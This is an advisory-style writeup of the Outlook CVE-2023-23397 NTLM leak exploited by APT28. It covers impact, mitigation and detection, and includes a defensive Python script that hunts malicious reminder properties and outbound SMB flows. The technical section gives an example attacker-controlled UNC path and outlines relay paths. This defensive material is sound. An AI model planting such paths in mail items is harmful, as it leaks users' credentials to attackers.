Microsoft Outlook, NTLM credential leak via PidLidReminderFileParameter (Fancy Bear)
Microsoft Outlook Elevation of Privilege Vulnerability. An attacker who successfully exploited this vulnerability could access a user's Net-NTLMv2 hash which could be used as a basis of an NTLM Relay attack against another service.
Overview
CVE-2023-23397 is a critical (CVSS 3.1 base score 9.8) elevation of privilege vulnerability in Microsoft Outlook for Windows that lets an attacker capture a user's Net-NTLMv2 authentication response without any user interaction. It was exploited in the wild by APT28 (Fancy Bear), a threat actor attributed to Russia's GRU, for nearly a year before Microsoft disclosed and patched it in March 2023. Attacks targeted Western government, military, transportation and energy sector organizations in Europe and the Middle East from at least April 2022.
Technical Details
The vulnerability lies in how Microsoft Outlook for Windows handles the PidLidReminderFileParameter MAPI named property, which specifies the sound file to play when a reminder fires. When the sender also sets PidLidReminderOverride, Outlook honours the custom sound path instead of the default, and if that path is a UNC path Outlook opens it like any other file, with no prompt and no user interaction.
When an attacker sends a specially crafted meeting invitation, appointment or task with this property set to a malicious UNC path (e.g., \\attacker.com\share\file.wav), Outlook automatically attempts to connect to the attacker-controlled SMB server as soon as the reminder is due. As part of SMB authentication, Windows performs NTLM negotiation on the user's behalf and sends the user's Net-NTLMv2 response (the challenge-response value commonly called the Net-NTLMv2 hash) to the attacker's server, effectively leaking the credential.
The attack requires no user interaction: the attacker sets the reminder time in the past, so the reminder is already due when the Outlook client retrieves and processes the item, before the user has opened or even seen it. Note that what leaks is the NTLMv2 response, not the NT hash: it cannot be used for pass-the-hash, which is why the impact below is limited to cracking and relaying.
Impact
The leaked Net-NTLMv2 response enables several follow-on attacks:
- Offline password cracking: the response is a keyed hash over a server challenge, so it can be attacked offline against wordlists; strong passwords survive, weak ones do not
- NTLM relay attacks: if the attacker's server relays the authentication live instead of merely capturing it, the victim's identity can be used against any service that accepts NTLM without enforcing signing or channel binding, such as LDAP on Domain Controllers where LDAP signing is not required, SMB on hosts that do not require signing, and HTTP endpoints on Exchange servers
- AD CS certificate theft: relaying to the Active Directory Certificate Services web enrollment endpoint (the ESC8 path) yields a certificate for the victim that can later be used to obtain Kerberos tickets; for privileged accounts this can lead to complete forest compromise
- Lateral movement: compromised credentials enable broader network access
Microsoft Threat Intelligence confirmed this vulnerability was used by APT28/Fancy Bear as part of their operational playbook against high-value targets.
Mitigation
- Apply patches: Install the March 2023 Outlook security update (released 14 March 2023) via the Microsoft 365 Apps update channels or the standalone MSI updates for perpetual Office builds; Outlook for Mac, iOS and Android and Outlook on the web are not affected
- Block outbound SMB: Block TCP/445 from clients to the Internet at the perimeter so that the connection to an external share cannot complete. Be aware that when SMB fails, Windows can fall back to WebDAV over TCP/80 through the WebClient service, which also authenticates with NTLM, so disable WebClient on workstations that do not need it
- Add users to the Protected Users security group: Members cannot authenticate with NTLM, so their credentials are neither leaked nor relayable; test first, because this also breaks legitimate applications that still depend on NTLM
- Audit mailboxes: Run Microsoft's published PowerShell script (CVE-2023-23397.ps1) against Exchange Server or Exchange Online to list, and optionally clean, messages, appointments and tasks that carry the PidLidReminderFileParameter property
Detection
- Review Exchange mailboxes for messages, appointments and tasks whose PidLidReminderFileParameter property is populated with a UNC path, and record the sender, recipient and target host for each hit
- Monitor for unusual outbound SMB connections (TCP/445) from workstations to external IP addresses, including blocked attempts: a denied connection still shows that a malicious reminder fired on that host
- Audit for follow-on domain-compromise activity, such as suspicious Kerberos golden ticket usage
- Review AD CS certificate issuances for anomalies, in particular certificates requested through web enrollment for accounts that do not normally enrol
- For environments that historically allowed outbound SMB, assume the Net-NTLMv2 responses of every user who received such an item were captured: reset those passwords and investigate accordingly
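As an added example (not code from this page, from Microsoft, or from the published scanning script), the following Python script covers the two hunts that the Technical Details section and the Detection list describe. It evaluates an item's reminder named properties (LIDs from MS-OXORMDR: PidLidReminderOverride 0x851C and PidLidReminderFileParameter 0x851F) to decide whether Outlook would fetch the reminder sound from a remote share and from which host, and it counts outbound TCP/445 flows to addresses outside a set of internal ranges from firewall log lines, then pairs the two. The sample items, the log line layout, and the list of internal address ranges are constructed assumptions; in practice the properties would come from an EWS or MAPI export and the log lines from your firewall.

```python
"""Hunting helpers for CVE-2023-23397 (added example; all sample data is constructed).
(1) Would an item's reminder properties make Outlook open a remote share, and where?
(2) Which outbound TCP/445 flows in firewall logs leave the internal address space?"""
import ipaddress
import re

# Named property LIDs in PSETID_Common, per MS-OXORMDR.
PID_LID_REMINDER_OVERRIDE = 0x851C        # honour the custom sound path below
PID_LID_REMINDER_FILE_PARAMETER = 0x851F  # path of the sound file (the leaking property)

# Assumed internal address space; tune to the environment.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]

# UNC spellings Windows accepts: \\host\share, \\?\UNC\host\share, \\.\UNC\host\share, //host/share
_UNC_PREFIX = re.compile(r"^(?:\\\\[?.]\\UNC\\|\\\\|//)", re.IGNORECASE)

def parse_unc(value):
    """Return (host, share_path) if value is a UNC path, else None."""
    if not isinstance(value, str):
        return None
    value = value.strip()
    m = _UNC_PREFIX.match(value)
    if not m:
        return None
    host, _, path = value[m.end():].replace("/", "\\").partition("\\")
    host = host.split("@", 1)[0]  # drop WebDAV suffixes such as host@80 or host@SSL
    return (host.lower(), path) if host else None

def is_external(host):
    """True for an IP outside INTERNAL_NETS or a dotted DNS name (heuristic)."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return "." in host  # single-label names are treated as intranet short names
    return not any(addr in net for net in INTERNAL_NETS)

def audit_item(props):
    """Classify one item given a dict of LID -> value; None if no UNC sound path."""
    target = parse_unc(props.get(PID_LID_REMINDER_FILE_PARAMETER))
    if target is None:
        return None
    host, path = target
    # With PidLidReminderOverride set, Outlook honours the custom path and connects as soon
    # as the reminder is due. Public PoCs also set PidLidReminderPlaySound (0x851E); it is
    # deliberately not required here so that variants are not missed.
    return {"host": host, "path": path, "external": is_external(host),
            "armed": bool(props.get(PID_LID_REMINDER_OVERRIDE))}

def scan_calendar_items(items):
    """Findings for every item whose reminder sound points at a share."""
    findings = []
    for item in items:
        finding = audit_item(item["props"])
        if finding:
            finding["subject"] = item.get("subject")
            findings.append(finding)
    return findings

# Assumed firewall log layout: "<ts> proto=<p> src=<ip>:<port> dst=<ip>:<port> action=<a>"
_FLOW = re.compile(r"proto=(?P<proto>\w+) src=(?P<src>[\d.]+):\d+ "
                   r"dst=(?P<dst>[\d.]+):(?P<dport>\d+) action=(?P<action>\w+)")

def outbound_smb_to_external(log_lines, ports=(445,)):
    """Count flows per (src, dst) on the given ports whose destination is external.
    Denied flows count too: a blocked attempt still proves a reminder fired on src."""
    counts = {}
    for line in log_lines:
        m = _FLOW.search(line)
        if not m or m["proto"].lower() != "tcp" or int(m["dport"]) not in ports:
            continue
        if is_external(m["dst"]):
            key = (m["src"], m["dst"])
            counts[key] = counts.get(key, 0) + 1
    return counts

def correlate(findings, flow_counts):
    """Map each flagged flow to the subjects of mailbox items naming the same host."""
    by_host = {}
    for f in findings:
        by_host.setdefault(f["host"], []).append(f["subject"])
    return {key: by_host.get(key[1], []) for key in flow_counts}

# Constructed sample data, not real mailbox exports or captures.
SAMPLE_ITEMS = [
    {"subject": "Sync", "props": {PID_LID_REMINDER_OVERRIDE: True,
        PID_LID_REMINDER_FILE_PARAMETER: r"\\203.0.113.10\share\reminder.wav"}},
    {"subject": "Team lunch", "props": {PID_LID_REMINDER_OVERRIDE: True,
        PID_LID_REMINDER_FILE_PARAMETER: r"\\?\UNC\files.example.net@80\dav\alert.wav"}},
    {"subject": "Ops", "props": {
        PID_LID_REMINDER_FILE_PARAMETER: r"\\fileserver\sounds\chime.wav"}},
]
SAMPLE_FLOWS = [
    "2023-03-15T10:01:02Z proto=tcp src=10.1.2.33:51422 dst=203.0.113.10:445 action=allow",
    "2023-03-15T10:01:05Z proto=tcp src=10.1.2.33:51423 dst=203.0.113.10:445 action=allow",
    "2023-03-15T10:02:11Z proto=tcp src=10.1.2.40:51500 dst=10.1.0.5:445 action=allow",
    "2023-03-15T10:03:40Z proto=udp src=10.1.2.33:137 dst=10.1.2.255:137 action=allow",
    "2023-03-15T10:04:00Z proto=tcp src=10.1.2.51:52000 dst=198.51.100.7:445 action=deny",
]

if __name__ == "__main__":
    hits = scan_calendar_items(SAMPLE_ITEMS)
    flows = outbound_smb_to_external(SAMPLE_FLOWS)
    for key, subjects in correlate(hits, flows).items():
        print(key, flows[key], subjects)
```

Two design points worth noting. The internal address list is explicit rather than derived from the ipaddress module's "global" test, because the documentation ranges used in the sample (and some ranges a given organisation routes internally) would otherwise be misclassified. And a denied outbound flow is kept as a finding: the block stops the leak to that server, but the attempt itself tells you which workstation processed a malicious reminder and therefore which mailbox to search.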